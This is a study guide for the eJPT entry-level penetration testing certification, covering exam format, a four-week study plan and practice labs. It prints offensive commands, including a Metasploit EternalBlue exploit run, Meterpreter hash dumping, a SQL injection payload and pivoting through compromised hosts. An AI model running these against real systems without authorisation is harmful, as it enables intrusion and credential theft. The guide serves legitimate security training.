eJPT Certification Guide 2026: How to Pass eLearnSecurity

The eJPT (eLearnSecurity Junior Penetration Tester) is widely considered the best entry-level penetration testing certification available. Offered by INE Security (formerly eLearnSecurity), it’s a fully hands-on, practical exam with no multiple-choice questions — you compromise real machines in a live network environment and answer questions based on your findings. If you’re just getting into ethical hacking and want a credential that proves real skills, eJPT is the place to start.

Why eJPT?

Before choosing a certification, it’s worth understanding what makes eJPT stand out:

• Fully practical exam — you perform real attacks against a real lab network
• Beginner-friendly — no experience required, but you need foundational networking knowledge
• Affordable — significantly cheaper than OSCP or CEH
• Respected — recognized by employers as proof of hands-on skills, not just memorized theory
• No expiration — once you pass, the cert is permanent (though re-sitting for updated versions is available)

The exam costs $200 USD and gives you 48 hours to complete it. That’s more than enough time for most candidates who have studied properly.

Exam Format

The eJPT exam places you inside a VPN-connected lab environment and asks you to answer 35 questions. These questions are answered by actually compromising hosts in the network, not by theory. Example question types:

• “What is the hostname of the machine at 192.168.X.X?”
• “What is the password for the user found on Machine B?”
• “What flag is located at /root/flag.txt on the target?”
• “How many open ports does the web server have?”

You need a 70% passing score (25 out of 35 questions). Questions have varying point values, so prioritize the higher-point items.

Prerequisites and Study Path

eJPT doesn’t have formal prerequisites, but you should be comfortable with:

• Basic Linux command line
• Networking concepts (IP, TCP/UDP, DNS, HTTP)
• How to use a terminal and basic tools

The INE Starter Pass

INE offers a free Starter Pass that includes the “Penetration Testing Student” (PTS) learning path — the official study course for eJPT. This course alone is sufficient to pass the exam if you work through it thoroughly. Go to ine.com and create a free account.

The PTS course covers:

• Networking fundamentals (TCP/IP, Wireshark, routing)
• Web application basics (HTTP, OWASP Top 10 concepts)
• Information gathering (Nmap, Maltego, passive recon)
• Exploitation (Metasploit Framework, manual exploitation)
• Post-exploitation (privilege escalation basics, pivoting)

Work through all the lab exercises — they’re critical. Watching videos without doing labs leads to exam failure.

Key Skills to Master

Network Scanning with Nmap

You’ll absolutely need Nmap. Know these core scans:

# TCP SYN scan all ports
nmap -sS -p- -T4 192.168.1.0/24

# Service and version detection
nmap -sV -sC 192.168.1.10

# OS detection
nmap -O 192.168.1.10

# Save output
nmap -sV -oN scan_results.txt 192.168.1.10

Metasploit Framework

Metasploit is the backbone of the eJPT exam. You need to know:

# Start Metasploit
msfconsole

# Search for exploits
search eternalblue

# Use a module
use exploit/windows/smb/ms17_010_eternalblue

# Set options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5

# Run
exploit

After getting a Meterpreter shell:

sysinfo          # Get system info
getuid           # Current user
shell            # Drop to a system shell
search -f *.txt  # Find text files
hashdump         # Dump password hashes

Web Application Testing

Know how to:

• Use Burp Suite to intercept and modify requests
• Identify and test for SQL injection manually (' OR 1=1--)
• Test for directory traversal
• Read cookies and session tokens

Pivoting and Routing

The eJPT exam often has multiple network segments. You need to pivot through compromised hosts to reach others:

# In Meterpreter
run autoroute -s 10.10.10.0/24
background

# Set up a SOCKS proxy through the pivot
use auxiliary/server/socks_proxy
set SRVPORT 1080
run

# Use proxychains to route traffic
proxychains nmap -sT 10.10.10.20

Study Schedule (4 Weeks)

Week 1: Foundations

• Complete the Networking and Web fundamentals sections of PTS
• Practice Wireshark packet analysis
• Install and configure Kali Linux in VirtualBox

Week 2: Information Gathering

• Master Nmap scanning techniques
• Practice with HackTheBox Starting Point machines
• Learn Metasploit basics

Week 3: Exploitation

• Work through all Metasploit labs in PTS
• Practice exploiting Metasploitable 2 in your local lab
• Learn manual exploitation for common vulnerabilities (SMB, FTP, SSH)

Week 4: Review and Practice

• Redo all INE labs
• Tackle 2–3 TryHackMe learning paths (Jr Penetration Tester path is perfect)
• Read through your notes and practice Nmap + Metasploit from memory

Free Practice Resources

• TryHackMe — “Jr Penetration Tester” path maps almost perfectly to eJPT topics
• HackTheBox Starting Point — free beginner machines
• Metasploitable 2 — deliberately vulnerable Linux VM for local practice
• DVWA — Damn Vulnerable Web Application for web testing practice

Exam Day Tips

• Take notes throughout — document every IP, open port, found credential, and flag
• Start with host discovery — map the entire network before touching anything
• Read each question carefully — some answers require specific output from specific commands
• Don’t get stuck — if one path isn’t working, move to other questions and come back
• Time is generous — 48 hours is plenty; don’t rush

The eJPT is an excellent foundation for OSCP, CEH, or CompTIA Security+. Passing it proves you can operate basic pentesting tools in a real environment — a meaningful differentiator when applying for your first security role.